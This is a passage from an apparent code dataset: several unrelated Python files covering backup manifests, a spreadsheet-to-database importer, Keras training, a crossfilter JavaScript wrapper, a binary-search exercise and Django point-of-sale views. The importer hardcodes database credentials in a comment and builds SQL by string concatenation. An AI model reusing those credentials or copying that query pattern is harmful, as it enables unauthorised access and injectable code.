{digest}'.format(type=hashtype.upper(), digest=hexdigest))\n return lines\n\n\nclass Volume(External):\n index = None\n\n def __init__(self, manifest, index):\n super(Volume, self).__init__(manifest)\n self.index = index\n\n def get_manifest_title(self):\n return 'Volume {}'.format(self.index)\n\n def get_filename(self):\n return {\n 'full': 'duplicity-full.{from}.vol{index}.difftar.gz',\n 'inc': 'duplicity-inc.{from}.to.{to}.vol{index}.difftar.gz',\n }.get(self._manifest.filename_type).format(index=self.index, **self._manifest.filename_match.groupdict())\n\n\nclass Signatures(External):\n def get_filename(self):\n return {\n 'full': 'duplicity-full-signatures.{from}.sigtar.gz',\n 'inc': 'duplicity-new-signatures.{from}.to.{to}.sigtar.gz',\n }.get(self._manifest.filename_type).format(**self._manifest.filename_match.groupdict())\n\n def get_manifest_title(self):\n return 'Signatures'\n\n\nclass ManifestError(Exception):\n pass\n\n\nclass ManifestSyntaxError(ManifestError):\n def __init__(self, description, filename, line):\n self.__description = description\n self.__filename = filename\n self.__line = line\n\n\nclass Manifest(object):\n filename = None\n statements = None\n signatures = None\n volumes = None\n\n filename_type = None\n filename_match = None\n\n re_filename_full = re.compile('^duplicity-full\\.(?P\\d{8}T\\d{6}Z)\\.manifest$')\n re_filename_inc = re.compile('^duplicity-inc\\.(?P\\d{8}T\\d{6}Z)\\.to\\.(?P\\d{8}T\\d{6}Z)\\.manifest$')\n re_volume = re.compile(r'^Volume (\\d+)$', re.I)\n\n def __init__(self):\n self.statements = []\n self.volumes = []\n\n @classmethod\n def from_file(cls, filename):\n with open(filename, 'r') as f:\n return cls.from_string(f.read(), filename)\n\n @classmethod\n def from_string(cls, s, filename):\n m = cls()\n m.filename = os.path.basename(filename)\n\n m.filename_match = cls.re_filename_full.match(m.filename)\n if m.filename_match:\n m.filename_type = 'full'\n else:\n m.filename_match = cls.re_filename_inc.match(m.filename)\n if m.filename_match:\n m.filename_type = 'inc'\n else:\n raise ManifestError('invalid manifest filename: {}'.format(m.filename))\n\n current = m\n line_number = 0\n for line in s.splitlines():\n line_number += 1\n line = line.strip()\n\n if not line:\n continue\n\n if line[-1] == ':':\n external = line[:-1]\n vol_match = cls.re_volume.match(external)\n if vol_match:\n current = Volume(m, int(vol_match.group(1)))\n m.volumes.append(current)\n elif external.lower() == 'signatures':\n current = Signatures(m)\n m.signatures = current\n else:\n raise ManifestSyntaxError('Unknown group section {}'.format(external), filename, line_number)\n else:\n splitted = line.split(' ')\n if isinstance(current, External):\n if len(splitted) == 3 and splitted[0].lower() == 'hash':\n current.hashes[splitted[1].lower()] = splitted[2]\n continue\n current.statements.append(line)\n return m\n\n def to_string(self):\n lines = []\n for statement in self.statements:\n lines.append(statement)\n externals = []\n if self.signatures:\n externals.append(self.signatures)\n externals += self.volumes\n\n for external in externals:\n lines += external.to_lines()\n\n lines.append('')\n\n return '\\n'.join(lines)\n","sub_path":"mdup5/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"372600659","text":"import constants as const\nimport GoogleSheet as GS\nimport httplib2\nfrom apiclient import discovery\nimport sqlalchemy as sa\nimport psycopg2\n\nclass ExcelParse:\n def __init__(self, username, sheetname, tablename):\n self.parsedResult = []\n self.tablename = tablename\n self.username = username\n self.sheetname = sheetname\n\n\n def printparsedresult(self):\n for quals in self.parsedResult:\n print(quals)\n\n def createwaferid(self, wafernumber, monthnum, year):\n return str(wafernumber) + monthnum + year\n\n def speaktogoogle(self):\n credentials = GS.get_credentials()\n http = credentials.authorize(httplib2.Http())\n discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n 'version=v4')\n service = discovery.build('sheets', 'v4', http=http,\n discoveryServiceUrl=discoveryUrl)\n spreadsheetId = '1cjuAJYUtwuF-VaXvx1lNNgmI7C1ZbIKWPp8ytMduqMI' # THIS IS OUR TEST SPREADSHEET ID, OWNED BY LIAM\n rangeName = self.sheetname + \"!A:AI\"\n result = service.spreadsheets().values().get(\n spreadsheetId=spreadsheetId, range=rangeName).execute()\n self.values = result.get('values', [])\n\n def digestxlsfile(self):\n self.speaktogoogle()\n self.parsedResult = []\n self.uniqueWaferIds = []\n for row in self.values:\n if row[0] != \"\" and row[0] != 'Wafer Number':\n rowlength = len(row)\n rownumber = int(row[0])\n waferid = self.createwaferid(rownumber, str(const.Month_To_Num_Map[self.sheetname.split(\" \")[0]]), self.sheetname.split(\" \")[1])\n self.uniqueWaferIds.append(waferid)\n col_value = []\n for i in range(0, const.MAX_NUM_TESTS):\n col_value.append([waferid, str(i)])\n for col in range(0, 33): # extract the data from the excel file\n if col in const.Qual_One_Col_Ranges:\n value = row[col]\n col_value[0].append(value)\n if col in const.Qual_Two_Col_Ranges and (\n rownumber in const.Qual_Test_2_Row_Ranges or rownumber > 73) and col < rowlength:\n value = row[col]\n col_value[1].append(value)\n if col in const.Qual_Three_Col_Ranges and rownumber in const.Qual_Test_3_Row_Ranges and col < rowlength:\n value = row[col]\n col_value[2].append(value)\n if col in const.Qual_Four_Col_Ranges and rownumber in const.Qual_Test_4_Row_Ranges and col < rowlength:\n value = row[col]\n col_value[3].append(value)\n # now remove anything that we did not use\n for lists in col_value:\n if len(lists) != 2:\n lists[2] = lists[2].replace(\"/\", \" | \") # change the seperator from / to |\n self.parsedResult.append(lists)\n\n def generateqlstatments(self):\n self.sqlprevcollis = 'DELETE FROM ' + self.tablename + ' WHERE waferNumber in (' # tear all of it down then redo\n self.sqlinsquery = 'INSERT INTO ' + self.tablename + ' VALUES \\n'\n for entry in self.parsedResult:\n entrystr = '(' + entry[0] + ',' + entry[1] + ','\n entrystr += \"'\" + entry[2] + \"'\" + ',' + \"'\" + entry[3].replace(\"μ\",\"u\").replace(\"Å\",\"A\") + \"'\"\n entrystr += ',' + \"'\" + entry[4] + \"'),\" # TODO: FIX THIS REPLACE!\n self.sqlinsquery += entrystr + '\\n'\n self.sqlinsquery = self.sqlinsquery[:-2] + \";\" # TODO: VERY HACK, TRY TO FIX THIS\n # print(self.sqlinsquery)\n\n for idnum in self.uniqueWaferIds:\n self.sqlprevcollis += str(idnum) + ','\n self.sqlprevcollis = self.sqlprevcollis[:-1] + ')' # TODO: VERY HACK, TRY TO FIX THIS\n # print(self.sqlprevcollis)\n\n\n def saveInformation(self):\n dbStr = \"dbname='\" + const.DB_DATABASE + \"' user='\" + const.DB_USER + \\\n \"' host='\" + const.DB_HOST + \"' password='\" + const.DB_PASSWORD + \"'\"\n self.conn = psycopg2.connect(dbStr)\n self.curr = self.conn.cursor()\n self.generateqlstatments()\n self.curr.execute(self.sqlinsquery)\n self.conn.commit()\n self.curr.close()\n self.conn.close()\n # engine = sa.create_engine(\n # 'mysql+pymysql://bb792d303df2e1:a13ec81f@us-cdbr-iron-east-04.cleardb.net/heroku_e4c84be715842b5')\n # conn = engine.connect()\n # # run the delete first\n # conn.execute(self.sqlprevcollis)\n # conn.execute(self.sqlinsquery)\n\nparser = ExcelParse(\"liamn\",\"November 2016\",\"sumo_table\")\nparser.digestxlsfile()\nparser.saveInformation()\n","sub_path":"PythonBackend/ExcelParse.py","file_name":"ExcelParse.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516823345","text":"from keras.callbacks import LearningRateScheduler, ModelCheckpoint,CSVLogger, TensorBoard, Callback\nfrom keras.optimizers import SGD\nfrom keras import backend as K\nimport numpy as np\nimport os\nimport time\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import LambdaCallback\n\nbase_path=\"./test_results/LipGeneModel/\"\n\n\nclass WeightsSaver(Callback):\n def __init__(self, N):\n self.N = N\n self.batch = 1\n\n def on_batch_end(self, batch, logs={}):\n if self.batch % self.N == 0:\n name = 'weights%08d.h5' % self.batch\n save_dir = os.path.join(base_path+\"adaptive/\", 'saved_models')\n self.model.save_weights(os.path.join(save_dir,name))\n self.batch += 1\n\nclass TimeHistory(Callback):\n def on_train_begin(self,logs={}):\n self.time_history=[]\n def on_epoch_begin(self,epoch,logs={}):\n self.epoch_start_time=time.time()\n def on_epoch_end(self,epoch,logs={}):\n self.time_history.append(time.time() - self.epoch_start_time)\n\nclass AbstractModel:\n \"\"\"\n The base class for all Model classes\n \"\"\"\n\n def __init__(self, path: str, bs: int = 64, train_size: float = 0.7, optimizer: str = 'sgd', epochs: int = 100,flag_type = \"adaptive\"):\n \"\"\"\n Initializes a Model instance.\n :param bs: Batch size\n :param train_size: Training set split size\n :param optimizer: Optimizer for neural network\n :param epochs: Number of epochs\n \"\"\"\n\n\n if optimizer == 'sgd':\n # self.optimizer = SGD(clipnorm=2.0)\n self.optimizer = SGD()\n else:\n raise NotImplementedError('Only SGD optimizer is implemented!')\n if bs < 1 or not isinstance(bs, int):\n raise ValueError('Improper batch size')\n if train_size < 0 or train_size > 1:\n raise ValueError('Improper train_size argument')\n if epochs < 1:\n raise ValueError('Invalid number of epochs')\n\n self.bs = bs\n self.train_size = train_size\n self.epochs = epochs\n\n self.lr_history = []\n self.model = None\n self.lr_time=[]\n\n self.loss = 'categorical_crossentropy'\n self.metrics = ['accuracy']\n\n self.x_train = self.x_test = self.y_train = self.y_test = None\n self.flag_type=flag_type\n\n def _get_model(self):\n \"\"\"\n Get a model instance.\n :return: Keras Model instance\n \"\"\"\n pass\n\n def _lr_schedule(self, epoch: int, base_lr: int, data=None):\n \"\"\"\n Get the learning rate for a given epoch. Note that this uses the LipschitzLR policy, so the epoch\n number doesn't actually matter.\n :param epoch: int. Epoch number\n :return: learning rate\n \"\"\"\n if data is None:\n data = self.x_train\n\n if self.task == 'regression':\n return 0.1\n\n penultimate_activ_func = K.function([self.model.layers[0].input], [self.model.layers[-2].output])\n\n Kz = 0.\n for i in range((len(self.x_train) - 1) // self.bs + 1):\n start_i = i * self.bs\n end_i = start_i + self.bs\n xb = self.x_train[start_i:end_i]\n\n activ = np.linalg.norm(penultimate_activ_func([xb]))\n if activ > Kz:\n Kz = activ\n\n K_ = ((self.n_classes - 1) * Kz) / (self.n_classes * self.bs)\n lr = 1 / K_\n\n self.lr_history.append(lr)\n return lr\n\n def record_output(self,epoch,logs):\n pass\n \n def constant_LR_decay(self,epoch: int,decay_factor: float):\n \"\"\"\n Return the learning rate for decay based scheduler\n \"\"\"\n pass\n\n def fit(self, finish_fit: bool = True):\n \"\"\"\n Fit to data.\n\n The parameter finish_fit is used in cases where you don't want to actually call\n model.fit(), but want to do something else instead. For an example, see\n symnet/image/resnet.py for an example. \n\n :param finish_fit: bool. Set to True unless you know what you're doing.\n :return: None\n \"\"\"\n\n if self.x_train is None or self.x_test is None or \\\n self.y_train is None or self.y_test is None:\n if finish_fit:\n raise ValueError('Data is None')\n\n self.model = self._get_model()\n\n lr_scheduler = LearningRateScheduler(self._lr_schedule)\n\n if(self.flag_type == \"adaptive\"):\n csv_logger=CSVLogger(filename=base_path+'adaptive/training_adaptive.log',append='True')\n save_dir = os.path.join(base_path+\"adaptive/\", 'saved_models')\n\n else:\n _,lr=self.flag_type.split(\";\")\n csv_logger=CSVLogger(filename=base_path+'constant/'+ 'trial_' + lr + '/training_constant.log',append='True')\n save_dir = os.path.join(base_path+'constant/'+ 'trial_' + lr , 'saved_models')\n\n \n # Prepare callbacks for model saving and for learning rate adjustment.\n model_name = 'model_best.h5'\n\n # # Prepare model model saving directory.\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n filepath = os.path.join(save_dir, model_name)\n checkpoint = ModelCheckpoint(filepath=filepath,\n monitor='loss',\n verbose=1,\n save_best_only=True,save_weights_only=True)\n\n\n\n print(\"self.optimizer\",self.optimizer,self.loss,self.metrics)\n self.model.compile(self.optimizer, loss=self.loss, metrics=self.metrics)\n\n if finish_fit:\n time_callback = TimeHistory()\n self.model.fit(self.x_train, self.y_train, validation_data=(self.x_test, self.y_test), epochs=self.epochs,\n batch_size=self.bs, shuffle=True, callbacks=[csv_logger,time_callback,checkpoint,lr_scheduler])\n string_to_dump=\"\"\n for i in range(len(time_callback.time_history)):\n string_to_dump += str(i)+\",\"+str(time_callback.time_history[i] + self.lr_time[i])+\"\\n\"\n # Save model \n\n # Save model weights\n if(self.flag_type == \"adaptive\"):\n self.model.save_weights(base_path+\"adaptive/model_weights.h5\")\n\n # Save model architecture as json\n model_json = self.model.to_json()\n with open(base_path+\"adaptive/model.json\",\"w\") as json_file:\n json_file.write(model_json)\n\n with open(base_path+\"adaptive/epoch_times_adaptive.log\",\"a\") as fp:\n fp.write(string_to_dump)\n else:\n _,lr=self.flag_type.split(\";\")\n\n self.model.save_weights(base_path+\"constant/trial_\" + lr + \"/model_weights.h5\")\n\n # Save model architecture as json\n model_json = self.model.to_json()\n with open(base_path+\"constant/trial_\"+ lr + \"/model.json\",\"w\") as json_file:\n json_file.write(model_json)\n \n with open(base_path+\"constant/trial_\"+ lr + \"/epoch_times.log\",\"a\") as fp:\n fp.write(string_to_dump)\n\n def predict(self, x: np.ndarray):\n \"\"\"\n Predict on new data\n :param x: array-like\n :return: predictions: array-like\n \"\"\"\n return self.model.predict(x)\n\n def score(self):\n \"\"\"\n Returns model performance on test set\n :return:\n \"\"\"\n\n if self.x_test is None or self.y_test is None:\n raise ValueError('Test data is None')\n\n return self.model.evaluate(self.x_test, self.y_test, batch_size=self.bs)","sub_path":"symnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593108739","text":"\"\"\" Module dedicated to register the data on the javascript part but also to display fiilters on the HTML layers to interact with it.\r\n@author: Olivier Nogues\r\n\r\n\"\"\"\r\n\r\nimport json\r\n\r\nfrom ares.Lib.html import AresHtmlInput, AresHtml\r\n\r\n\r\nclass HtmlData(AresHtml.Html):\r\n \"\"\" Base class to store the data \"\"\"\r\n\r\n @AresHtml.deprecated\r\n def __init__(self, aresObj, data):\r\n \"\"\" Transform data from Python to Javascript \"\"\"\r\n super(HtmlData, self).__init__(aresObj, data)\r\n\r\n def __store(self, globalVar=True):\r\n \"\"\" Store the variable as a javascript variable \"\"\"\r\n if globalVar:\r\n self.aresObj.jsGlobal.add(\" %s = %s \" % (self.htmlId, json.dumps(self.vals)))\r\n\r\n @property\r\n def htmlId(self):\r\n \"\"\" Property to get the HTML ID of a python HTML object \"\"\"\r\n return \"%s_%s\" % (self.__class__.__name__.lower(), id(self))\r\n\r\n @property\r\n def jqId(self):\r\n \"\"\" \"\"\"\r\n return self.htmlId\r\n\r\n @property\r\n def val(self):\r\n \"\"\" Property to get the jquery value of the HTML objec in a python HTML object \"\"\"\r\n return self.jqId\r\n\r\n def __str__(self):\r\n \"\"\" \"\"\"\r\n self.__store()\r\n return ''\r\n\r\n\r\nclass HtmlDataDic(HtmlData):\r\n \"\"\" Special object to manage recordSet \"\"\"\r\n\r\n @AresHtml.deprecated\r\n def addFilter(self, key, value, label, cssCls=None, cssAttr=None):\r\n \"\"\" Add a filter to the dictionary \"\"\"\r\n AresHtmlInput.InputText(self.aresObj, value, cssCls=cssCls, cssAttr=cssAttr, htmllId=\"filter_%s_%s\" % (self.htmlId, key))\r\n\r\n def get(self, val):\r\n \"\"\" Return the value of a javascript dictionary \"\"\"\r\n return \"%s[%s]\" % (self.htmlId, val)\r\n\r\n\r\nclass CrossFilterGroup(object):\r\n \"\"\"\r\n\r\n \"\"\"\r\n references = ['https://github.com/square/crossfilter/wiki/API-Reference']\r\n\r\n def __init__(self, aresObj, filter, key, val, top=None, bottom=None, grpName=None, reduceFnc='reduceSum'):\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n self.aresObj = aresObj\r\n self.links, self.filters = set(), set()\r\n self.xFilter, self.dimDefined = filter, False\r\n if val is not None:\r\n self.htmlId = \"%s_%s_%s\" % (filter.htmlId, key, val)\r\n else:\r\n # This dimension is never used in the process to aggregate results\r\n # It is an internal dimension to be able to filter on the recordSet\r\n self.htmlId = \"%s_%s\" % (filter.htmlId, key)\r\n if grpName is None:\r\n grpName = self.htmlId\r\n self.jsVar = {'htmlId': self.htmlId, 'val': val, 'key': key, 'filterId': filter.htmlId, 'top': top,\r\n 'grpName': grpName, 'bottom': bottom, 'htmlDimId': '%s_dim' % self.htmlId, 'xfilterDefault': AresHtml.CROSS_FILTER_DEFAULT,\r\n 'filterFnc': \"return d['%(key)s'] ;\"}\r\n if reduceFnc == 'reduceSum':\r\n self.jsVar['reduceFnc'] = \"reduceSum( function(d) { return +d['%(val)s'] ; } )\" % self.jsVar # Default function the reduceSum\r\n elif reduceFnc == 'reduceCount':\r\n self.jsVar['reduceFnc'] = 'reduceCount()'\r\n else:\r\n raise Exception(\"Reduce Function not recognised by CrossFilter %s\" % reduceFnc)\r\n\r\n def reduceSum(self):\r\n \"\"\" \"\"\"\r\n self.jsVar['reduceFnc'] = \"reduceSum( function(d) { return +d['%(val)s'] ; } )\" % self.jsVar\r\n\r\n def reduceCount(self):\r\n \"\"\" \"\"\"\r\n self.jsVar['reduceFnc'] = 'reduceCount()'\r\n\r\n def filter(self, col, htmlObj=None, val=None):\r\n \"\"\"\r\n\r\n .filter( function (d) { var val = %s; if (val == 'all') {return true} else {return d.key == val }; } )\r\n :return:\r\n \"\"\"\r\n if col != self.jsVar['key'] :\r\n # Section dedicated to filter on a sub array in the main recordSet\r\n # Basically this is suited when the recordSet in in this structure and we need to get multiple series\r\n # recordSet = { {'category': 'A', 'value': 10, 'date': 1}, {'category': 'A', 'value': 20, 'date': 2}\r\n # {'category': 'B', 'value': 30, 'date': 1}, {'category': 'B', 'value': 40, 'date': 2}\r\n # ]\r\n # And we need to get two series\r\n # seriesA = [{'key': 1, value: 10}, {'key': 2, value: 20}] and SeriesB ...\r\n self.jsVar.update({'seriesKey': col, 'seriesVal': val})\r\n self.jsVar['htmlDimId'] = '%s_%s_dim' % (self.htmlId, AresHtml.cleanData(val))\r\n self.jsVar['filterFnc'] = \"if(d['%(seriesKey)s'] == '%(seriesVal)s' ) { return d['%(key)s'] ;} else { return %(xfilterDefault)s ;}\"\r\n #self.jsVar['filterFnc'] = \".filterFunction(function (d) { return d >= startDate; }); \"\r\n else:\r\n if val is not None:\r\n self.jsVar['filterVal'] = \"'%s'\" % val\r\n self.jsVar['filter'] = \".filter( function (d) { var val = '%s'; if (val == 'all') { return true } else { return d == val } } )\" % val\r\n else:\r\n self.filters.add(htmlObj)\r\n self.jsVar['filterVal'] = htmlObj.val\r\n self.jsVar['filter'] = \".filter( function (d) { var val = %s; if (val == 'all') { return true } else { return d == val } } )\" % htmlObj.val\r\n\r\n self.aresObj.jsGlobal.add(\"%(htmlDimId)s = %(filterId)s.dimension(function(d) { %(filterFnc)s } ) \" % self.jsVar % self.jsVar)\r\n self.jsVar['filterDef'] = \"%(htmlDimId)s%(filter)s\" % self.jsVar\r\n return self\r\n\r\n def removeFilters(self):\r\n \"\"\" remove all the filters already attached to this crossfilter object and dimension\r\n\r\n :return: A string corresponding to the javascript function to remove crossfilter filters\r\n \"\"\"\r\n return \"%(htmlId)s_dim.filterAll()\" % self.jsVar\r\n\r\n def dimension(self):\r\n \"\"\" Return the result of a dimension\r\n\r\n :return:\r\n \"\"\"\r\n if 'filter' not in self.jsVar:\r\n self.aresObj.jsGlobal.add(\"%(htmlDimId)s = %(filterId)s.dimension(function(d) { %(filterFnc)s } )\" % self.jsVar % self.jsVar)\r\n\r\n return \"%(htmlDimId)s.group().%(reduceFnc)s\" % self.jsVar\r\n\r\n def val(self):\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n if self.jsVar['top'] is not None:\r\n return \"%(htmlDimId)s.top(%(top)s)\" % self.jsVar\r\n\r\n if self.jsVar['bottom'] is not None:\r\n return \"%(htmlDimId)s.bottom(%(bottom)s)\" % self.jsVar\r\n\r\n def data(self):\r\n \"\"\"\r\n\r\n :return:\r\n \"\"\"\r\n self.jsVar['vars'] = []\r\n for col, filterGrp in self.xFilter.filters.items():\r\n filter = filterGrp[1]\r\n if col != self.jsVar['key']:\r\n self.jsVar['vars'].append(filter.removeFilters())\r\n self.jsVar['vars'].append(\"var x%(htmlId)s_data = %(filterDef)s.group().%(reduceFnc)s.top(Infinity)\" % filter.jsVar)\r\n self.jsVar['vars'].append(\"%s_xdata = []\" % filter.htmlId)\r\n self.jsVar['vars'].append(\"x%(htmlId)s_data.forEach( function(p, i) { if ( (p.key == %(filterVal)s) || (%(filterVal)s == 'all') ) {%(htmlId)s_xdata.push(p)} else { %(htmlId)s_xdata.push( {key: p.key, value: 0 }) ; } } )\" % filter.jsVar)\r\n if 'filter' in self.jsVar:\r\n self.jsVar['vars'].append(self.removeFilters())\r\n self.jsVar['vars'].append(\"var x%(htmlId)s_data = %(filterDef)s.group().%(reduceFnc)s.top(Infinity) ;\" % self.jsVar)\r\n self.jsVar['vars'].append(\"%s_xdata = []\" % self.htmlId)\r\n self.jsVar['vars'].append(\"x%(htmlId)s_data.forEach( function(p, i) { if ( (p.key == %(filterVal)s) || (%(filterVal)s == 'all') ) {%(htmlId)s_xdata.push(p)} else { %(htmlId)s_xdata.push( {key: p.key, value: 0 }) ; } } );\" % self.jsVar)\r\n return {'vars': \";\".join(self.jsVar['vars']), 'data': '%s_xdata' % self.htmlId}\r\n\r\n if self.jsVar['top'] is not None:\r\n return {'vars': \";\".join(self.jsVar['vars']), 'data': \"%s.top(%s)\" % (self.dimension(), self.jsVar['top'])}\r\n\r\n if self.jsVar['bottom'] is not None:\r\n return {'vars': \";\".join(self.jsVar['vars']), 'data': \"%s.bottom(%s)\" % (self.dimension(), self.jsVar['bottom'])}\r\n\r\n def size(self):\r\n \"\"\" Wrapper function to the size cross filter function\r\n\r\n :return: Add a button to display an alert with the size of the recordsets\r\n \"\"\"\r\n self.aresObj.jsOnLoadFnc.add('''var $input = $(\"\"); $input.appendTo($('#page-content-wrapper'));''' % self.jsVar)\r\n self.aresObj.jsOnLoadFnc.add(''' $('#%s_button').on('click',function(){ alert(%s.size()) ; }); ''' % (self.jsVar['htmlId'], self.dimension()))\r\n\r\n\r\nclass HtmlDataCrossFilter(object):\r\n \"\"\" Special object to manage recordSet \"\"\"\r\n reqJs = ['crossfilter']\r\n references = ['http://dc-js.github.io/dc.js/examples/download-table.html',\r\n 'https://stackoverflow.com/questions/33102032/crossfilter-group-a-filtered-dimension',\r\n 'https://github.com/square/crossfilter/wiki/API-Reference']\r\n\r\n def __init__(self, aresObj, recordSet, header, isJsObject):\r\n \"\"\" Instantiate the Cross Filter object\r\n\r\n :param aresObj: The ares Object\r\n :param recordSet: The recordSet with all your data to be used\r\n :param header: The recordSet header definition\r\n :return:\r\n \"\"\"\r\n self.aresObj, self.header = aresObj, header # The html object ID\r\n for js in self.reqJs:\r\n self.aresObj.jsImports.add(js)\r\n self.links, self.filters, self.grps, self.charts = set(), {}, {}, set()\r\n if not isJsObject:\r\n self.recordSet = recordSet # Store the recordSet information\r\n self.aresObj.jsGlobal.add(\"%s = crossfilter(%s)\" % (self.htmlId, json.dumps(self.recordSet)))\r\n else:\r\n # The recordSet is already defined in the Javascript layer in another HTML python object\r\n # here the python will only be there to set the crossfilter object\r\n self.aresObj.jsOnLoadFnc.add(\"%s = crossfilter(%s)\" % (self.htmlId, recordSet))\r\n self.recordSet = None\r\n\r\n def add(self, recordSet):\r\n \"\"\" Cross filter wrapper to the add function\r\n\r\n :param recordSet: The recordSet to be added to the main one\r\n :return:\r\n \"\"\"\r\n self.aresObj.jsOnLoadFnc.add(\"%s.add(%s)\" % (self.htmlId , json.dumps(recordSet)))\r\n\r\n def size(self):\r\n \"\"\" Wrapper function to the size cross filter function\r\n\r\n :return: Add a button to display an alert with the size of the recordsets\r\n \"\"\"\r\n self.aresObj.jsOnLoadFnc.add('''var $input = $(\"\"); $input.appendTo($('#page-content-wrapper'));''' % self.htmlId)\r\n self.aresObj.jsOnLoadFnc.add(''' $('#%s_button').on('click',function(){ alert(%s.size()) ; }); ''' % (self.htmlId, self.htmlId))\r\n\r\n @property\r\n def htmlId(self):\r\n \"\"\" Property to get the HTML ID of a python HTML object \"\"\"\r\n return \"%s_%s\" % (self.__class__.__name__.lower(), id(self))\r\n\r\n def group(self, colGrp, valGrp, top='Infinity', grpName=None, reduceFnc='reduceSum'):\r\n \"\"\" CrossFilter grouping function\r\n\r\n :param colGrp: The key in the recordset used as key to aggregate the data\r\n :param valGrp: The key in the recordset used as val to aggregate the data\r\n :return:\r\n \"\"\"\r\n if grpName is None:\r\n grpName = 'Series %s per %s' % (colGrp, valGrp)\r\n groupOjb = CrossFilterGroup(self.aresObj, self, colGrp, valGrp, top, grpName=grpName, reduceFnc=reduceFnc)\r\n self.grps[colGrp] = groupOjb # Store the different group attached to a crossFilter python wrapper object\r\n return groupOjb\r\n\r\n def addFilter(self, col, title, cssCls=None, cssAttr=None):\r\n \"\"\" Add a CrossFilter filter to the recordset. The process will find out the correct dimension on which this filter\r\n should be applied\r\n\r\n :param col: The column used as a filter.\r\n :param title: The title of the filter\r\n :param cssCls: The class for the selection HTML component\r\n :param cssAttr: The CSS attribute\r\n :return:\r\n \"\"\"\r\n if self.recordSet is None:\r\n filerObj = self.aresObj.input(title, dflt='all', cssCls=cssCls, cssAttr=cssAttr)\r\n else:\r\n filVals = sorted(list(set([rec[col] for rec in self.recordSet])))\r\n if len(filVals) > 20:\r\n # Change automatically the component to a input text box with selection\r\n filerObj = self.aresObj.input(title, dflt='all', cssCls=cssCls, cssAttr=cssAttr)\r\n filerObj.autocomplete(['all'] + filVals)\r\n else:\r\n filerObj = self.aresObj.select(['all'] + filVals, title, cssCls=cssCls, cssAttr=cssAttr)\r\n if not col in self.grps:\r\n # The process will automatically construct the missing dimension\r\n self.group(col, 'tip')\r\n self.grps[col].filter(col, filerObj)\r\n self.filters[col] = (filerObj, self.grps[col])\r\n return filerObj\r\n\r\n def addTextFilter(self, col, title, cssCls=None, cssAttr=None):\r\n \"\"\"\r\n\r\n :param col:\r\n :param title:\r\n :param cssCls:\r\n :param cssAttr:\r\n :return:\r\n \"\"\"\r\n filVals = sorted(list(set([rec[col] for rec in self.recordSet])))\r\n filerObj = self.aresObj.input(title, dflt='all', cssCls=cssCls, cssAttr=cssAttr)\r\n if not col in self.grps:\r\n # The process will automatically construct the missing dimension\r\n self.group(col, 'tip')\r\n self.grps[col].filter(col, filerObj)\r\n self.filters[col] = (filerObj, self.grps[col])\r\n return filerObj\r\n\r\n def display(self, dimension):\r\n \"\"\" Debug function to be able to see easily the result of your CrossFilter implementation for a specified dimension\r\n\r\n :param dimension: The python dimension object\r\n :return:\r\n \"\"\"\r\n self.aresObj.jsOnLoadFnc.add('''var $input = $(\"\"); $input.appendTo($('#page-content-wrapper'));''' % self.htmlId)\r\n self.aresObj.jsOnLoadFnc.add(''' $('#%s_button').on('click',function(){ %s; alert(%s.toSource()) ; }); ''' % (self.htmlId, dimension.data()['vars'], dimension.data()['data']))\r\n\r\n","sub_path":"ares/Lib/html/AresHtmlData.py","file_name":"AresHtmlData.py","file_ext":"py","file_size_in_byte":13451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"211966241","text":"#baekjoon 1920 find Num\n\ndef finding(target, num):\n num.sort()\n start = 0\n end = len(num) - 1\n\n while start <= end:\n #이진탐색은 중간값부터 값을 찾아나가기 시작한다.\n mid = (start+end)//2\n\n\n if num[mid] == target:\n return 1\n # 만약에 값이 다르면, 타겟보다 작을경우 시작숫자르\n # 타겟숫자보다 클 경우 end 숫자를 높여준다..\n elif num[mid] < target:\n start = mid + 1\n else:\n end = mid - 1\n\n return 0\n\n\n#hello\nn = int(input())\nnum = list(map(int, input().split()))\n\ncase = int(input())\ncasenum = list(map(int, input().split()))\nres = list()\n\nfor i in range(case):\n res.append(finding(casenum[i], num))\n\nfor i in range(case):\n print(res[i])\n\nprint('hello')","sub_path":"baek1920.py","file_name":"baek1920.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"341562315","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom inventory.models import *\n\n\n# Create your views here.\n\n@login_required\ndef pos_homeView(request):\n all_products = Product.objects.all()[:10]\n if request.user.is_authenticated:\n customer = request.user\n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n cart_items = order.orderitem_set.all()\n context = {\n 'all_products': all_products,\n 'order': order,\n 'cart_items': cart_items,\n 'payment_mode': Payment_mode\n }\n else:\n context = {\n 'all_products': all_products,\n 'order': [],\n 'cart_items': []\n }\n return render(request, 'pos/pos.html', context)\n\n\ndef receiptView(request, pk):\n try:\n order = Order.objects.get(pk=pk)\n cart_items = order.orderitem_set.all()\n context = {\n 'order': order,\n 'cart_items': cart_items,\n 'cart_items_quantity': order.get_cart_items_quantity,\n 'cart_total': order.get_cart_revenue,\n 'cart_mrp_total': order.get_cart_mrp,\n 'savings': order.get_cart_mrp - order.get_cart_revenue,\n }\n return render(request, 'pos/receipt.html', context)\n except ObjectDoesNotExist:\n return render(request, 'pos/receipt.html', {'error': \"ERROR REASON: \"\n \"Maybe order doesn't exist,\"\n \" Check if you have completed the order on POS page,\"\n \" Check orders page to print the receipt\"})\n\n\ndef productLabelView(request, pk):\n try:\n product = Product.objects.get(product_code=pk)\n context = {\n 'product': product,\n }\n return render(request, 'pos/product-label.html', context)\n except ObjectDoesNotExist:\n return render(request, 'pos/product-label.html', {'error': \"ERROR REASON: \"\n \"Product not found with that product 